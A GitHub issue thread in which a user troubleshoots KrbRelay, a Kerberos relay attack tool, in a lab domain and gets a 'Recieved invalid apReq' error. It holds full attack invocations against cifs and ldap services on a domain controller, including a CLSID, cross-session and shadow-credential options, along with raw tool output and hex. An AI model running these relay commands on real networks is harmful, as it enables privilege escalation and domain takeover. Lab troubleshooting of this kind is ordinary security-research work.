Invalid apReq
mgp25 opened this issue · comments
Hello, I was getting the message Recieved invalid apReq, exploit will fail
and read issue (#1) where you suggested to check environment and parameters. Could you point what should we look at?
Info and steps to reproduce
- DC01: Windows Server 2019
- PC01: Windows 10
- Attacker PC: Windows 10
A user is logged on PC01 (session checked query session
):
PS > query session
NOMBRE DE SESIÓN NOMBRE DE USUARIO ID ESTADO TIPO DISPOSITIVO
services 0 Desc
>console user1 1 Activo
Here is the log:
PS C:\Users\attacker\Desktop> .\KrbRelay.exe -spn cifs/dc01.lab.local -session 1 -clsid 354ff91b-5e49-4bdc-a8e6-1cb6c6877182 -console
[*] Relaying context: DESKTOP-GJKLN17\attacker
[*] Rewriting function table
[*] Rewriting PEB
[*] GetModuleFileName: System
[*] Init com server
[*] GetModuleFileName: C:\Users\attacker\Desktop\KrbRelay.exe
[*] Register com server
objref:TUVPVwEAAAAAAAAAAAAAAMAAAAAAAABGgQIAAAAAAACgd0eTYtluhPpC9CsKnCTbAgQAAKAQ//+ktx2fV11FtiIADAAHADEAMgA3AC4AMAAuADAALgAxAAAAAAAJAP//AAAeAP//AAAQAP//AAAKAP//AAAWAP//AAAfAP//AAAOAP//AAAAAA==:
[*] Forcing cross-session authentication
[*] Using CLSID: 354ff91b-5e49-4bdc-a8e6-1cb6c6877182
[*] Spawning in session 1
[-] Recieved invalid apReq, exploit will fail
05000b0710000000e800400002000000d016d0160000000003000000000001004301000000000000c00000000000004600000000045d888aeb1cc9119fe808002b10486002000000010001004301000000000000c0000000000000460000000033057171babe37498319b5dbef9ccc3601000000020001004301000000000000c000000000000046000000002c1cb76c129840450300000000000000010000000a050000000000004e544c4d535350000100000097b208e209000900370000000f000f00280000000a00614a0000000f4445534b544f502d474a384b4d3437574f524b47524f5550
Hope I am not missing anything
Thanks!
attacker is a non-domain context
Hello @cube0x0, thanks for your fast response!
I tried it within a domain context too but it failed :/
PS C:\Users\usuario1.LAB\Desktop> .\KrbRelay.exe -spn cifs/dc01.lab.local -session 2 -clsid 354ff91b-5e49-4bdc-a8e6-1cb6c6877182 -console
[*] Relaying context: LAB\usuario1
[*] Rewriting function table
[*] Rewriting PEB
[*] GetModuleFileName: System
[*] Init com server
[*] GetModuleFileName: C:\Users\usuario1.LAB\Desktop\KrbRelay.exe
[*] Register com server
objref:TUVPVwEAAAAAAAAAAAAAAMAAAAAAAABGgQIAAAAAAAC+r/qOx2Z1B+pLzMg2PGlZAuwAAGwb//9Nj4c5NmmdUiIADAAHADEAMgA3AC4AMAAuADAALgAxAAAAAAAJAP//AAAeAP//AAAQAP//AAAKAP//AAAWAP//AAAfAP//AAAOAP//AAAAAA==:
[*] Forcing cross-session authentication
[*] Using CLSID: 354ff91b-5e49-4bdc-a8e6-1cb6c6877182
[*] Spawning in session 2
[-] Recieved invalid apReq, exploit will fail
05000b0710000000d7002f0002000000d016d0160000000003000000000001004301000000000000c00000000000004600000000045d888aeb1cc9119fe808002b10486002000000010001004301000000000000c0000000000000460000000033057171babe37498319b5dbef9ccc3601000000020001004301000000000000c000000000000046000000002c1cb76c129840450300000000000000010000000a050000000000004e544c4d535350000100000097b208e2030003002c00000004000400280000000a00614a0000000f504330314c4142
Another attempt:
PS C:\Users\usuario1.LAB\Desktop> .\KrbRelay.exe -spn ldap/dc01.lab.local -clsid 354ff91b-5e49-4bdc-a8e6-1cb6c6877182 -shadowcred
[*] Relaying context: lab.local\PC01$
[*] Rewriting function table
[*] Rewriting PEB
[*] GetModuleFileName: System
[*] Init com server
[*] GetModuleFileName: C:\Users\usuario1.LAB\Desktop\KrbRelay.exe
[*] Register com server
objref:TUVPVwEAAAAAAAAAAAAAAMAAAAAAAABGgQIAAAAAAAC9YZtQo5H86MSpLrTJ2iK+AjQAAMQB//8h5G+ahu59CCIADAAHADEAMgA3AC4AMAAuADAALgAxAAAAAAAJAP//AAAeAP//AAAQAP//AAAKAP//AAAWAP//AAAfAP//AAAOAP//AAAAAA==:
[*] Forcing SYSTEM authentication
[*] Using CLSID: 354ff91b-5e49-4bdc-a8e6-1cb6c6877182
[-] Recieved invalid apReq, exploit will fail
05000b0710000000d7002f0002000000d016d0160000000003000000000001004301000000000000c00000000000004600000000045d888aeb1cc9119fe808002b10486002000000010001004301000000000000c0000000000000460000000033057171babe37498319b5dbef9ccc3601000000020001004301000000000000c000000000000046000000002c1cb76c129840450300000000000000010000000a050000000000004e544c4d535350000100000097b208e2030003002c00000004000400280000000a00614a0000000f504330314c4142